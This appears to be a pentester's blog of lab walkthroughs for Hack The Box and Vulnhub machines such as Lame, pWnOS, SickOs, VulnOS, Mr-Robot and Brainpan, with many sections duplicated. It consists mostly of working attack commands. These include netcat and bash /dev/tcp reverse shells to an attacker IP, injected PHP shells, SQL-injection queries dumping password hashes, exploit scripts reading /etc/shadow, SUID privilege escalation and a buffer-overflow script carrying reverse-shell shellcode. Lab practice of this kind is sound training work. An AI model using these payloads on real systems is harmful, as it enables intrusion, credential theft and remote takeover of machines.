source: https://www.hackthebox.eu/home/machines/profile/2
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
smb-vuln-cve2009-3103
smb-vuln-ms08-067
smb-vuln-ms17-010
ms08-067
TODO: but actually I cannot get reverse shell without the help of metasploit exploits
ms17-010 download nc.exe via FTP, then get reverse shell
Wednesday, October 16, 2019
HackTheBox: Lame
source: https://www.hackthebox.eu/home/machines/profile/1
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args=”distcc-cve2004-2687.cmd=’nc 10.10.14.2 443 -e /bin/bash’”
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args=”distcc-cve2004-2687.cmd=’nc 10.10.14.2 443 -e /bin/bash’”
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
Vulnhub: pWnOS: 2.0 (Pre-Release)
source: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
change to dhcp:
init=/bin/bash
mount -o remount,rw /
vim /etc/network/interfaces
then reboot
192.168.1.8
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
maybe ubuntu 12.04
/info/
/info.php
/login/
/register
/activate
/blog
/includes
PHP Version 5.3.5-1ubuntu7
http://192.168.1.8/blog/
https://www.exploit-db.com/exploits/1191
Simple PHP Blog 0.4.0 - Multiple Remote s
perl ./1191.pl -h http://192.168.1.8/blog -e 1
perl ./1191.pl -h http://192.168.1.8/blog -e 3 -U foo -P bar
http://192.168.1.8/blog/images/cmd.php?cmd=id
reverse shell:
login, upload rs.php
http://192.168.1.8/blog/images/rs.php
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 11.04"
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
cat /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
mysql -uroot -pgoodday -e “SHOW DATABASES”
ERROR 1045
https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
change to dhcp:
init=/bin/bash
mount -o remount,rw /
vim /etc/network/interfaces
then reboot
192.168.1.8
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
maybe ubuntu 12.04
/info/
/info.php
/login/
/register
/activate
/blog
/includes
PHP Version 5.3.5-1ubuntu7
http://192.168.1.8/blog/
https://www.exploit-db.com/exploits/1191
Simple PHP Blog 0.4.0 - Multiple Remote s
perl ./1191.pl -h http://192.168.1.8/blog -e 1
perl ./1191.pl -h http://192.168.1.8/blog -e 3 -U foo -P bar
http://192.168.1.8/blog/images/cmd.php?cmd=id
reverse shell:
login, upload rs.php
http://192.168.1.8/blog/images/rs.php
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 11.04"
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
cat /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
mysql -uroot -pgoodday -e “SHOW DATABASES”
ERROR 1045
https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Vulnhub: pWnOS: 1.0
source: https://www.vulnhub.com/entry/pwnos-10,33/
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
Vulnhub: SickOs: 1.2
source: https://www.vulnhub.com/entry/sickos-12,144/
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url=’/test/rs.php’,http-put.file=’./rs.php’
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo “chmod +s /bin/bash” > /tmp/update
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url=’/test/rs.php’,http-put.file=’./rs.php’
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo “chmod +s /bin/bash” > /tmp/update
Tuesday, October 15, 2019
Vulnhub: SickOs: 1.1
source: https://www.vulnhub.com/entry/sickos-11,132/
192.168.1.107
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
maybe ubuntu 11.10/12.04
gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/DiscoveryWeb-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
192.168.1.107
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
maybe ubuntu 11.10/12.04
gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/DiscoveryWeb-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
curl --proxy http://192.168.1.107:3128 http://192.168.1.107/robots.txt
Dissalow: /wolfcms
http://192.168.1.107/wolfcms/docs/updating.txt
v0.8.2
https://github.com/wolfcms/wolfcms/tree/0.8.2/wolf
http://192.168.1.107/wolfcms/?/admin/login
username admin, password admin
reverse shell:
upload rs.php
http://192.168.1.107/wolfcms/public/rs.php
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
cat /var/www/wolfcms/config.php
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);
ssh username sickos, password john@123
Vulnhub: VulnOS: 2
source: https://www.vulnhub.com/entry/vulnos-2,147/
192.168.1.106
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
192.168.1.106
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
maybe ubuntu 14.04
ngircd-21 (i686/pc/linux-gnu)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
http://192.168.1.106/jabc
/includes (Status: 301)
/misc (Status: 301)
/modules (Status: 301)
/profiles (Status: 301)
/robots.txt (Status: 200)
/scripts (Status: 301)
/sites (Status: 301)
/templates (Status: 301)
/themes (Status: 301)
/index.php (Status: 200)
/xmlrpc.php (Status: 200)
http://192.168.1.106/jabc/profiles/standard/standard.info
version = “7.26”
http://192.168.1.106/jabc/?q=node/7
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest
http://192.168.1.106/jabcd0cs
username guest, password guest
OpenDocMan v1.2.7
https://www.exploit-db.com/exploits/32075
OpenDocMan 1.2.7 - Multiple Vulnerabilities
http://192.168.1.106/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,schema_name,3,4,5,6,7,8,9%20from%20information_schema.schemata
SELECT 1,schema_name,3,4,5,6,7,8,9 FROM information_schema.schemata
drupal7
jabcd0cs
SELECT 1,concat(table_schema,0x3a,table_name),3,4,5,6,7,8,9 FROM information_schema.tables
drupal7:users
jabcd0cs:odm_user
mysql:user
SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 FROM information_schema.columns
drupal7:users:name
drupal7:users:pass
jabcd0cs:odm_user:username
jabcd0cs:odm_user:password
mysql:user:User
mysql:user:Password
SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9 FROM jabcd0cs.odm_user
webmin:b78aae356709f8c31118ea613980954b -> webmin1980
SELECT 1,concat(name,0x3a,pass),3,4,5,6,7,8,9 FROM drupal7.users
webmin:$S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug
SELECT 1,concat(User,0x3a,Password),3,4,5,6,7,8,9 FROM mysql.user
root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
debian-sys-maint:*6BC5901B87B5DF07E1C2BA75C15C537EB6B4078B
phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
drupal7:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
ssh username webmin, password webmin1980
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu 14.04.4 LTS"
/etc/passwd
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
https://www.exploit-db.com/exploits/37292
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
Monday, October 14, 2019
Vulnhub: VulnOS: 1
source: https://www.vulnhub.com/entry/vulnos-1,60/
192.168.1.105
ubuntu server 10.04 LTS
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open distccd distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp open irc IRCnet ircd
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)
38175/tcp open nlockmgr 1-4 (RPC #100021)
41631/tcp open mountd 1-3 (RPC #100005)
55692/tcp open status 1 (RPC #100024)
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
/.htaccess (Status: 200)
/cgi-bin/ (Status: 403)
/imgs (Status: 301)
/index (Status: 200)
/index.html (Status: 200)
/index2 (Status: 200)
/javascript (Status: 301)
/mediawiki (Status: 301)
mediawiki v1.15.1
/phpldapadmin (Status: 301)
phpLDAPadmin v1.2.0.5
/phpmyadmin (Status: 301)
phpmyadmin v3.3.2.0
/phppgadmin (Status: 301)
phpPgAdmin v4.2.2 (PHP 5.3.2-1ubuntu4.23)
/server-status (Status: 403)
/drupal6 (Status: 301)
/DVWA-1.0.8
http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
/egroupware (Status: 301)
stylite’s egroupware v1.8
/phpgroupware (Status: 301)
phpGroupWare 1:0.9.16.012+dfsg-10 (Debian)
/phpsysinfo (Status: 301)
phpsysinfo v3.0.4
2.6.32-57-generic-pae (SMP) i686
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl 2017.pl 192.168.1.105 10000 /etc/passwd 0
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
webmin:x:1002:1002::/home/webmin:/bin/sh
hackme:x:1003:1003::/home/hackme:/bin/sh
sa:x:1004:1004::/home/sa:/bin/sh
stupiduser:x:1005:1005::/home/stupiduser:/bin/sh
perl 2017.pl 192.168.1.105 10000 /etc/shadow 0
vulnosadmin:$6$SLXu95CH$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::
sysadmin:admin:16137:0:99999:7:::
webmin:webmin:16137:0:99999:7:::
hackme:hackme:16137:0:99999:7:::
sa:password1:16137:0:99999:7:::
stupiduser:stupiduser:16137:0:99999:7:::
192.168.1.105
ubuntu server 10.04 LTS
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open distccd distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp open irc IRCnet ircd
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)
38175/tcp open nlockmgr 1-4 (RPC #100021)
41631/tcp open mountd 1-3 (RPC #100005)
55692/tcp open status 1 (RPC #100024)
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
/.htaccess (Status: 200)
/cgi-bin/ (Status: 403)
/imgs (Status: 301)
/index (Status: 200)
/index.html (Status: 200)
/index2 (Status: 200)
/javascript (Status: 301)
/mediawiki (Status: 301)
mediawiki v1.15.1
/phpldapadmin (Status: 301)
phpLDAPadmin v1.2.0.5
/phpmyadmin (Status: 301)
phpmyadmin v3.3.2.0
/phppgadmin (Status: 301)
phpPgAdmin v4.2.2 (PHP 5.3.2-1ubuntu4.23)
/server-status (Status: 403)
/drupal6 (Status: 301)
/DVWA-1.0.8
http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
/egroupware (Status: 301)
stylite’s egroupware v1.8
/phpgroupware (Status: 301)
phpGroupWare 1:0.9.16.012+dfsg-10 (Debian)
/phpsysinfo (Status: 301)
phpsysinfo v3.0.4
2.6.32-57-generic-pae (SMP) i686
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl 2017.pl 192.168.1.105 10000 /etc/passwd 0
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
webmin:x:1002:1002::/home/webmin:/bin/sh
hackme:x:1003:1003::/home/hackme:/bin/sh
sa:x:1004:1004::/home/sa:/bin/sh
stupiduser:x:1005:1005::/home/stupiduser:/bin/sh
perl 2017.pl 192.168.1.105 10000 /etc/shadow 0
vulnosadmin:$6$SLXu95CH$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::
sysadmin:admin:16137:0:99999:7:::
webmin:webmin:16137:0:99999:7:::
hackme:hackme:16137:0:99999:7:::
sa:password1:16137:0:99999:7:::
stupiduser:stupiduser:16137:0:99999:7:::
http://192.168.1.105/DVWA-1.0.8/vulnerabilities/exec/
; echo "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'\");?>" > /var/www/dolibarr-3.0.0/rs.php
http://192.168.1.105/dolibarr-3.0.0/rs.php
cp /home/hackme/vulnleaks.pdf.zip /var/www/dolibarr-3.0.0
john vulnleaks.pdf.zip:
password admins
cp /home/sysadmin/user_bankaccounts.ods /var/www/dolibarr-3.0.0
vulnosadmin 125487-9821211-5987 4574 1256000$
root 156987-1458971 9871 569000000$
sa 48726987-89578 7412 450000$
webmin 48741269-5897412 7485 130050$
/var/www/webERP/config.php:
$DBUser = 'root';
$DBPassword = 'toor';
mysql username root, password toor
http://192.168.1.105/dolibarr-3.0.0/htdocs/
username vulnosadmin, password vulnosadmin
http://192.168.1.105/webERP/
username admin, password weberp
username WEB0000017, password weberp
http://192.168.1.105/drupal6/
username drupal6, password drupal6
username webmin, password
http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
username gordonb, password abc123
username 1337, password charley
username pablo, password letmein
username smithy, password password
upload /tmp/rs.php
upload /tmp/1.cgi
#!/usr/bin/perl -w
print “Content-type: text/plain\n\n”
exec "php /tmp/rs.php";
perl ./2017.pl 192.168.1.105 10000 /tmp/1.cgi 0
Vulnhub: Mr-Robot: 1
source: https://www.vulnhub.com/entry/mr-robot-1,151/
192.168.1.103
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
192.168.1.103
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
+ OSVDB-3092: /admin/: This might be interesting…
+ Uncommon header 'link' found, with contents: <http://192.168.1.103/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
http://192.168.1.103/feed/
wordpress v4.3.20
http://192.168.1.103/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
http://192.168.1.103/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
http://192.168.1.103/fsocity.dic
https://mrrobot.fandom.com/wiki/Characters
username elliot
cat fsocity.dic | sort | uniq > fsocity_uniq.dic
wpscan --url http://192.168.1.103 --usernames elliot -P ./fsocity_uniq.dic
username elliot, password ER28-0652
wpscan --url http://192.168.1.103 --usernames mich05654 -P ./fsocity_uniq.dic
username mich05654, password Dylan_2791
Appearance->Editor 404.php
http://192.168.1.103/404.php
system(‘ls -la’);
system(‘cat you-will-never-guess-this-file-name.txt’);
hello there person who found me.
reverse shell:
system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'");
find / -type f -name “key-2-of-3.txt” 2>/dev/null
/home/robot/key-2-of-3.txt
ls -l /home/robot
key-2-of-3.txt
password.raw-md5
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
john:
username robot, password abcdefghijklmnopqrstuvwxyz
python -c “import pty; pty.spawn(‘/bin/bash’);”
su robot
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Friday, October 11, 2019
Vulnhub: Brainpan: 1
source: https://www.vulnhub.com/entry/brainpan-1,51/
192.168.1.97
#!/usr/bin/python
import socket
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.90 LPORT=443 EXITFUNC=thread -f python -v payload -b "\x00"
payload = b""
payload += b"\xda\xdc\xbe\x1b\xe9\x6c\x36\xd9\x74\x24\xf4\x58"
payload += b"\x33\xc9\xb1\x12\x31\x70\x17\x03\x70\x17\x83\xf3"
payload += b"\x15\x8e\xc3\x32\x3d\xb8\xcf\x67\x82\x14\x7a\x85"
payload += b"\x8d\x7a\xca\xef\x40\xfc\xb8\xb6\xea\xc2\x73\xc8"
payload += b"\x42\x44\x75\xa0\x94\x1e\x84\x6a\x7d\x5d\x87\x8b"
payload += b"\xc6\xe8\x66\x3b\x5e\xbb\x39\x68\x2c\x38\x33\x6f"
payload += b"\x9f\xbf\x11\x07\x4e\xef\xe6\xbf\xe6\xc0\x27\x5d"
payload += b"\x9e\x97\xdb\xf3\x33\x21\xfa\x43\xb8\xfc\x7d"
#buffer = 'A' * (528-len(payload)) + "DCBA"
